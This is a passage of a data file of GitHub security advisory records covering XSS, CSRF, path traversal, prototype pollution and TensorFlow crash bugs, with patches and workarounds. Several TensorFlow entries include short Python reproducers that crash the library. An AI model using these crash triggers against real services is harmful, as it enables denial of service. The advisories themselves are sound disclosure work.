'https://www.nuget.org/packages/OPCFoundation.NetStandard.Opc.Ua/'}]","{'cwe_ids': ['CWE-295'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-05-07T21:55:21Z', 'nvd_published_at': '2021-02-16T20:15:00Z'}"
+1.4.0,GHSA-mw6q-98mp-g8g8,2023-01-23T18:49:17Z,2021-11-08T17:54:46Z,,['CVE-2021-23472'],Cross-site Scripting in bootstrap-table,This affects all versions of package bootstrap-table. A type confusion vulnerability can lead to a bypass of input sanitization when the input provided to the escapeHTML function is an array (instead of a string) even if the escape attribute is set.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:N/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'bootstrap-table'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.19.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-23472'}, {'type': 'PACKAGE', 'url': 'https://github.com/wenzhixin/bootstrap-table'}, {'type': 'WEB', 'url': 'https://github.com/wenzhixin/bootstrap-table/blob/develop/src/utils/index.js%23L218'}, {'type': 'WEB', 'url': 'https://security.snyk.io/vuln/SNYK-JS-BOOTSTRAPTABLE-1657597'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARS-1910690'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSBOWER-1910689'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSBOWERGITHUBWENZHIXIN-1910687'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-1910688'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-BOOTSTRAPTABLE-1657597'}]","{'cwe_ids': ['CWE-79', 'CWE-843'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2021-11-04T17:00:48Z', 'nvd_published_at': '2021-11-03T18:15:00Z'}"
+1.4.0,GHSA-c9x9-xv66-xp3v,2021-11-08T18:54:51Z,2021-11-10T15:30:36Z,,['CVE-2020-14389'],Improper privilege management in Keycloak,"A flaw was found in Keycloak, where it would permit a user with a view-profile role to manage the resources in the new account console. This flaw allows a user with a view-profile role to access and modify data for which the user does not have adequate permission.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.keycloak:keycloak-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '12.0.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-14389'}, {'type': 'WEB', 'url': 'https://access.redhat.com/security/cve/cve-2020-14389'}]","{'cwe_ids': ['CWE-269', 'CWE-916'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-11-08T18:54:51Z', 'nvd_published_at': '2020-11-17T02:15:00Z'}"
+1.4.0,GHSA-8xfw-5q82-3652,2023-05-26T15:07:05Z,2021-11-18T20:15:23Z,,[],Authentication Bypass by CSRF Weakness,"### Impact
+
+CSRF vulnerability that allows user account takeover.
+
+All applications using any version of the frontend component of `spree_auth_devise` are affected if `protect_from_forgery` method is both:
+
+* Executed whether as:
+ * A before_action callback (the default)
+ * A prepend_before_action (option prepend: true given) before the :load_object hook in Spree::UserController (most likely order to find).
+* Configured to use :null_session or :reset_session strategies (:null_session is the default in case the no strategy is given, but rails --new generated skeleton use :exception).
+
+That means that applications that haven't been configured differently from what it's generated with Rails aren't affected.
+
+Thanks @waiting-for-dev for reporting and providing a patch 👏
+
+### Patches
+
+Spree 4.1 users should update to spree_auth_devise 4.1.1
+
+### Workarounds
+
+If possible, change your strategy to :exception:
+
+```ruby
+class ApplicationController < ActionController::Base
+ protect_from_forgery with: :exception
+end
+```
+
+Add the following to`config/application.rb `to at least run the `:exception` strategy on the affected controller:
+
+```ruby
+config.after_initialize do
+ Spree::UsersController.protect_from_forgery with: :exception
+end
+```
+
+### References
+https://github.com/solidusio/solidus_auth_devise/security/advisories/GHSA-xm34-v85h-9pg2
+","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'RubyGems', 'name': 'spree_auth_devise'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.1.0'}, {'fixed': '4.1.1'}]}], 'versions': ['4.1.0']}]","[{'type': 'WEB', 'url': 'https://github.com/solidusio/solidus_auth_devise/security/advisories/GHSA-xm34-v85h-9pg2'}, {'type': 'WEB', 'url': 'https://github.com/spree/spree_auth_devise/security/advisories/GHSA-8xfw-5q82-3652'}, {'type': 'WEB', 'url': 'https://github.com/rubysec/ruby-advisory-db/blob/master/gems/spree_auth_devise/CVE-2021-41275.yml'}, {'type': 'PACKAGE', 'url': 'https://github.com/spree/spree_auth_devise'}]","{'cwe_ids': ['CWE-352'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-11-17T21:44:45Z', 'nvd_published_at': None}"
+1.4.0,GHSA-w2f4-hxpm-mq98,2021-11-17T21:12:00Z,2021-11-15T23:17:37Z,,['CVE-2021-3915'],bookstack is vulnerable to Unrestricted Upload of File with Dangerous Type,bookstack is vulnerable to Unrestricted Upload of File with Dangerous Type.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:L/A:H'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'ssddanbrown/bookstack'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '21.0.3'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-3915'}, {'type': 'WEB', 'url': 'https://github.com/bookstackapp/bookstack/commit/ae155d67454d6b9f6c93b2bb457aaa4b2eb1a9ed'}, {'type': 'PACKAGE', 'url': 'https://github.com/BookStackApp/BookStack'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/fcb65f2d-257a-46f4-bac9-f6ded5649079'}]","{'cwe_ids': ['CWE-434'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-11-15T20:34:14Z', 'nvd_published_at': '2021-11-13T10:15:00Z'}"
+1.4.0,GHSA-6mqr-q86q-6gwr,2023-05-26T15:07:57Z,2021-11-18T20:15:09Z,,[],Authentication Bypass by CSRF Weakness,"### Impact
+
+CSRF vulnerability that allows user account takeover.
+
+All applications using any version of the frontend component of `spree_auth_devise` are affected if `protect_from_forgery` method is both:
+
+* Executed whether as:
+ * A before_action callback (the default)
+ * A prepend_before_action (option prepend: true given) before the :load_object hook in Spree::UserController (most likely order to find).
+* Configured to use :null_session or :reset_session strategies (:null_session is the default in case the no strategy is given, but rails --new generated skeleton use :exception).
+
+That means that applications that haven't been configured differently from what it's generated with Rails aren't affected.
+
+Thanks @waiting-for-dev for reporting and providing a patch 👏
+
+### Patches
+
+Spree 4.3 users should update to spree_auth_devise 4.4.1
+Spree 4.2 users should update to spree_auth_devise 4.2.1
+
+### Workarounds
+
+If possible, change your strategy to :exception:
+
+```ruby
+class ApplicationController < ActionController::Base
+ protect_from_forgery with: :exception
+end
+```
+
+Add the following to`config/application.rb `to at least run the `:exception` strategy on the affected controller:
+
+```ruby
+config.after_initialize do
+ Spree::UsersController.protect_from_forgery with: :exception
+end
+```
+
+### References
+https://github.com/solidusio/solidus_auth_devise/security/advisories/GHSA-xm34-v85h-9pg2
+","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'RubyGems', 'name': 'spree_auth_devise'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.2.0'}, {'fixed': '4.2.1'}]}], 'versions': ['4.2.0']}]","[{'type': 'WEB', 'url': 'https://github.com/solidusio/solidus_auth_devise/security/advisories/GHSA-xm34-v85h-9pg2'}, {'type': 'WEB', 'url': 'https://github.com/spree/spree_auth_devise/security/advisories/GHSA-6mqr-q86q-6gwr'}, {'type': 'WEB', 'url': 'https://github.com/spree/spree_auth_devise/commit/50bf2444a851f10dff926eb4ea3674976d9d279d'}, {'type': 'WEB', 'url': 'https://github.com/rubysec/ruby-advisory-db/blob/master/gems/spree_auth_devise/CVE-2021-41275.yml'}, {'type': 'PACKAGE', 'url': 'https://github.com/spree/spree_auth_devise'}]","{'cwe_ids': ['CWE-352'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-11-17T21:43:39Z', 'nvd_published_at': None}"
+1.4.0,GHSA-458f-26r3-x2c3,2021-11-25T00:24:32Z,2021-11-29T18:00:21Z,,['CVE-2021-20848'],Cross-site Scripting in github.com/schollz/rwtxt,Cross-site scripting vulnerability in rwtxt versions prior to v1.8.6 allows a remote attacker to inject an arbitrary script via unspecified vectors.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/schollz/rwtxt'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.8.6'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-20848'}, {'type': 'WEB', 'url': 'https://github.com/schollz/rwtxt/commit/c09fb17375c4c47b49524c688288af1fe20e730a'}, {'type': 'PACKAGE', 'url': 'https://github.com/schollz/rwtxt'}, {'type': 'WEB', 'url': 'https://jvn.jp/en/jp/JVN22515597/index.html'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-11-25T00:24:32Z', 'nvd_published_at': '2021-11-24T16:15:00Z'}"
+1.4.0,GHSA-xrqm-fpgr-6hhx,2021-11-08T22:47:54Z,2021-11-10T19:13:16Z,,['CVE-2021-41202'],Overflow/crash in `tf.range`,"### Impact
+While calculating the size of the output within the `tf.range` kernel, there is a conditional statement of type `int64 = condition ? int64 : double`. Due to C++ implicit conversion rules, both branches of the condition will be cast to `double` and the result would be truncated before the assignment. This result in overflows:
+
+```python
+import tensorflow as tf
+
+tf.sparse.eye(num_rows=9223372036854775807, num_columns=None)
+```
+
+Similarly, `tf.range` would result in crashes due to overflows if the start or end point are too large.
+
+```python
+import tensorflow as tf
+
+tf.range(start=-1e+38, limit=1)
+```
+
+### Patches
+We have patched the issue in GitHub commits [6d94002a09711d297dbba90390d5482b76113899](https://github.com/tensorflow/tensorflow/commit/6d94002a09711d297dbba90390d5482b76113899) (merging [#51359](https://github.com/tensorflow/tensorflow/pull/51359)) and [1b0e0ec27e7895b9985076eab32445026ae5ca94](https://github.com/tensorflow/tensorflow/commit/1b0e0ec27e7895b9985076eab32445026ae5ca94) (merging [#51711](https://github.com/tensorflow/tensorflow/pull/51711)).
+
+The fix will be included in TensorFlow 2.7.0. We will also cherrypick this commit on TensorFlow 2.6.1, TensorFlow 2.5.2, and TensorFlow 2.4.4, as these are also affected and still in supported range.
+
+### For more information
+Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.
+
+### Attribution
+This vulnerability has been reported externally via [GitHub issue](https://github.com/tensorflow/tensorflow/issues/46912), [GitHub issue](https://github.com/tensorflow/tensorflow/issues/46899) and [GitHub issue](https://github.com/tensorflow/tensorflow/issues/46889).
+","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.6.0'}, {'fixed': '2.6.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.4.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.6.0'}, {'fixed': '2.6.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.4.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.6.0'}, {'fixed': '2.6.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.4.4'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-xrqm-fpgr-6hhx'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-41202'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/issues/46889'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/issues/46912'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/1b0e0ec27e7895b9985076eab32445026ae5ca94'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/6d94002a09711d297dbba90390d5482b76113899'}, {'type': 'PACKAGE', 'url': 'https://github.com/tensorflow/tensorflow'}]","{'cwe_ids': ['CWE-681'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-11-08T22:47:54Z', 'nvd_published_at': '2021-11-05T22:15:00Z'}"
+1.4.0,GHSA-m539-j985-hcr8,2021-11-08T22:56:11Z,2021-11-10T19:36:21Z,,['CVE-2021-41196'],Crash in `max_pool3d` when size argument is 0 or negative,"### Impact
+The Keras pooling layers can trigger a segfault if the size of the pool is 0 or if a dimension is negative:
+
+```python
+import tensorflow as tf
+
+pool_size = [2, 2, 0]
+layer = tf.keras.layers.MaxPooling3D(strides=1, pool_size=pool_size)
+input_tensor = tf.random.uniform([3, 4, 10, 11, 12], dtype=tf.float32)
+res = layer(input_tensor)
+```
+
+This is due to the TensorFlow's implementation of pooling operations where the values in the sliding window are not checked to be strictly positive.
+
+### Patches
+We have patched the issue in GitHub commit [12b1ff82b3f26ff8de17e58703231d5a02ef1b8b](https://github.com/tensorflow/tensorflow/commit/12b1ff82b3f26ff8de17e58703231d5a02ef1b8b) (merging [#51975](https://github.com/tensorflow/tensorflow/pull/51975)).
+
+The fix will be included in TensorFlow 2.7.0. We will also cherrypick this commit on TensorFlow 2.6.1, TensorFlow 2.5.2, and TensorFlow 2.4.4, as these are also affected and still in supported range.
+
+### For more information
+Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.
+
+### Attribution
+This vulnerability has been reported externally via a [GitHub issue](https://github.com/tensorflow/tensorflow/issues/51936).
+","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.6.0'}, {'fixed': '2.6.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.4.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.6.0'}, {'fixed': '2.6.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.4.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.6.0'}, {'fixed': '2.6.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.4.4'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-m539-j985-hcr8'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-41196'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/issues/51936'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/12b1ff82b3f26ff8de17e58703231d5a02ef1b8b'}, {'type': 'PACKAGE', 'url': 'https://github.com/tensorflow/tensorflow'}]","{'cwe_ids': ['CWE-191'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-11-08T22:56:11Z', 'nvd_published_at': '2021-11-05T20:15:00Z'}"
+1.4.0,GHSA-vpf5-82c8-9v36,2022-07-05T18:01:27Z,2021-11-23T21:15:35Z,,['CVE-2021-23433'],Prototype Pollution in algoliasearch-helper,The package algoliasearch-helper before 3.6.2 are vulnerable to Prototype Pollution due to use of the merge function in src/SearchParameters/index.jsSearchParameters._parseNumbers without any protection against prototype properties. Note that this vulnerability is only exploitable if the implementation allows users to define arbitrary search patterns.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'algoliasearch-helper'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.6.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-23433'}, {'type': 'WEB', 'url': 'https://github.com/algolia/algoliasearch-helper-js/commit/4ff542b70b92a6b81cce8b9255700b0bc0817edd'}, {'type': 'PACKAGE', 'url': 'https://github.com/algolia/algoliasearch-helper-js'}, {'type': 'WEB', 'url': 'https://github.com/algolia/algoliasearch-helper-js/blob/3.5.5/src/SearchParameters/index.js%23L291'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-ALGOLIASEARCHHELPER-1570421'}]","{'cwe_ids': ['CWE-1321', 'CWE-915'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-11-22T19:34:30Z', 'nvd_published_at': '2021-11-19T20:15:00Z'}"
+1.4.0,GHSA-364w-9g92-3grq,2021-11-17T22:04:33Z,2021-11-16T23:40:08Z,2021-11-17T15:41:54Z,['CVE-2021-43617'],Withdrawn: Laravel Framework does not sufficiently block the upload of executable PHP content.,"# Withdrawn
+
+This advisory has been withdrawn after the maintainers of Laravel noted this issue is not a security vulnerability with Laravel itself, but rather a userland issue.
+
+## Original CVE based description
+
+Laravel Framework through 8.70.2 does not sufficiently block the upload of executable PHP content because Illuminate/Validation/Concerns/ValidatesAttributes.php lacks a check for .phar files, which are handled as application/x-httpd-php on systems based on Debian. In some use cases, this may be related to file-type validation for image upload (e.g., differences between getClientOriginalExtension and other approaches).",[],"[{'package': {'ecosystem': 'Packagist', 'name': 'laravel/framework'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '8.70.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-43617'}, {'type': 'PACKAGE', 'url': 'https://github.com/laravel/framework'}, {'type': 'WEB', 'url': 'https://github.com/laravel/framework/blob/2049de73aa099a113a287587df4cc522c90961f5/src/Illuminate/Validation/Concerns/ValidatesAttributes.php#L1130-L1132'}, {'type': 'WEB', 'url': 'https://github.com/laravel/framework/blob/2049de73aa099a113a287587df4cc522c90961f5/src/Illuminate/Validation/Concerns/ValidatesAttributes.php#L1331-L1333'}, {'type': 'WEB', 'url': 'https://hosein-vita.medium.com/laravel-8-x-image-upload-bypass-zero-day-852bd806019b'}, {'type': 'WEB', 'url': 'https://salsa.debian.org/php-team/php/-/blob/dc253886b5b2e9bc8d9e36db787abb083a667fd8/debian/php-cgi.conf#L5-6'}, {'type': 'WEB', 'url': 'https://salsa.debian.org/php-team/php/-/commit/dc253886b5b2e9bc8d9e36db787abb083a667fd8'}]","{'cwe_ids': ['CWE-434'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-11-15T22:20:46Z', 'nvd_published_at': '2021-11-14T16:15:00Z'}"
+1.4.0,GHSA-c4rh-4376-gff4,2021-12-03T15:22:02Z,2021-11-24T21:12:04Z,,['CVE-2021-40830'],Improper certificate management in AWS IoT Device SDK v2,"The AWS IoT Device SDK v2 for Java, Python, C++ and Node.js appends a user supplied Certificate Authority (CA) to the root CAs instead of overriding it on Unix systems. TLS handshakes will thus succeed if the peer can be verified either from the user-supplied CA or the system’s default trust-store. Attackers with access to a host’s trust stores or are able to compromise a certificate authority already in the host's trust store (note: the attacker must also be able to spoof DNS in this case) may be able to use this issue to bypass CA pinning. An attacker could then spoof the MQTT broker, and either drop traffic and/or respond with the attacker's data, but they would not be able to forward this data on to the MQTT broker because the attacker would still need the user's private keys to authenticate against the MQTT broker. The 'aws_tls_ctx_options_override_default_trust_store_*' function within the aws-c-io submodule has been updated to override the default trust store. This corrects this issue. This issue affects: Amazon Web Services AWS IoT Device SDK v2 for Java versions prior to 1.5.0 on Linux/Unix. Amazon Web Services AWS IoT Device SDK v2 for Python versions prior to 1.6.1 on Linux/Unix. Amazon Web Services AWS IoT Device SDK v2 for C++ versions prior to 1.12.7 on Linux/Unix. Amazon Web Services AWS IoT Device SDK v2 for Node.js versions prior to 1.5.3 on Linux/Unix. Amazon Web Services AWS-C-IO 0.10.4 on Linux/Unix.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:A/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'software.amazon.awssdk.iotdevicesdk:aws-iot-device-sdk'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.5.0'}]}]}, {'package': {'ecosystem': 'npm', 'name': 'aws-iot-device-sdk-v2'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.5.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'awsiotsdk'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.6.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-40830'}, {'type': 'WEB', 'url': 'https://github.com/aws/aws-iot-device-sdk-java-v2/commit/67950ad2a02f2f9355c310b69dc9226b017f32f2'}, {'type': 'WEB', 'url': 'https://github.com/aws/aws-iot-device-sdk-js-v2/commit/53a36e3ac203291494120604d416b6de59177cac'}, {'type': 'WEB', 'url': 'https://github.com/aws/aws-iot-device-sdk-python-v2/commit/0450ce68add7e3d05c6d781ecdac953c299c053a'}, {'type': 'WEB', 'url': 'https://github.com/aws/aws-iot-device-sdk-cpp-v2'}, {'type': 'WEB', 'url': 'https://github.com/aws/aws-iot-device-sdk-java-v2'}, {'type': 'WEB', 'url': 'https://github.com/aws/aws-iot-device-sdk-js-v2'}, {'type': 'WEB', 'url': 'https://github.com/aws/aws-iot-device-sdk-python-v2'}, {'type': 'WEB', 'url': 'https://github.com/awslabs/aws-c-io/'}]","{'cwe_ids': ['CWE-295'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-11-24T20:28:03Z', 'nvd_published_at': '2021-11-23T00:15:00Z'}"
+1.4.0,GHSA-3hfw-x7gx-437c,2021-11-23T21:45:31Z,2021-11-23T21:58:56Z,,['CVE-2021-41281'],Path traversal in Matrix Synapse,"### Impact
+
+Synapse instances with the media repository enabled can be tricked into downloading a file from a remote server into an arbitrary directory, potentially outside the media store directory.
+
+The last two directories and file name of the path are chosen randomly by Synapse and cannot be controlled by an attacker, which limits the impact.
+
+Homeservers with the media repository disabled are unaffected. Homeservers configured with a federation whitelist are also unaffected.
+
+### Patches
+Server administrators should upgrade to 1.47.1 or later.
+
+### Workarounds
+Server administrators using a reverse proxy could, at the expense of losing media functionality, block the following endpoints:
+
+* `/_matrix/media/r0/download/{serverName}/{mediaId}`
+* `/_matrix/media/r0/download/{serverName}/{mediaId}/{fileName}`
+* `/_matrix/media/r0/thumbnail/{serverName}/{mediaId}`
+
+Alternatively, non-containerized deployments can be adapted to use the hardened systemd config, located at `contrib/systemd/override-hardened.conf`.
+
+### References
+n/a
+
+### For more information
+
+If you have any questions or comments about this advisory, e-mail us at security@matrix.org.
+","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'matrix-synapse'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.47.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/matrix-org/synapse/security/advisories/GHSA-3hfw-x7gx-437c'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-41281'}, {'type': 'WEB', 'url': 'https://github.com/matrix-org/synapse/commit/91f2bd090'}, {'type': 'PACKAGE', 'url': 'https://github.com/matrix-org/synapse'}, {'type': 'WEB', 'url': 'https://github.com/matrix-org/synapse/releases/tag/v1.47.1'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/EU7QRE55U4IUEDLKT5IYPWL3UXMELFAS/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/N3WY56LCEZ4ZECLWV5KMAXF2PSMUB4F2/'}]","{'cwe_ids': ['CWE-22'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-11-23T18:44:39Z', 'nvd_published_at': '2021-11-23T20:15:00Z'}"
+1.4.0,GHSA-vwhq-49r4-gj9v,2021-11-08T22:24:08Z,2021-11-10T18:58:16Z,,['CVE-2021-41214'],Reference binding to `nullptr` in `tf.ragged.cross`,"### Impact
+The [shape inference code for `tf.ragged.cross`](https://github.com/tensorflow/tensorflow/blob/8d72537c6abf5a44103b57b9c2e22c14f5f49698/tensorflow/core/ops/ragged_array_ops.cc#L64) has an undefined behavior due to binding a reference to `nullptr`. In the following scenario, this results in a crash:
+
+```python
+import tensorflow as tf
+
+@tf.function
+def test():
+ y = tf.ragged.cross([tf.ragged.constant([['1']]),'2'])
+ return y
+
+test()
+```
+
+### Patches
+We have patched the issue in GitHub commit [fa6b7782fbb14aa08d767bc799c531f5e1fb3bb8](https://github.com/tensorflow/tensorflow/commit/fa6b7782fbb14aa08d767bc799c531f5e1fb3bb8).
+
+The fix will be included in TensorFlow 2.7.0. We will also cherrypick this commit on TensorFlow 2.6.1, TensorFlow 2.5.2, and TensorFlow 2.4.4, as these are also affected and still in supported range.
+
+### For more information
+Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.
+
+### Attribution
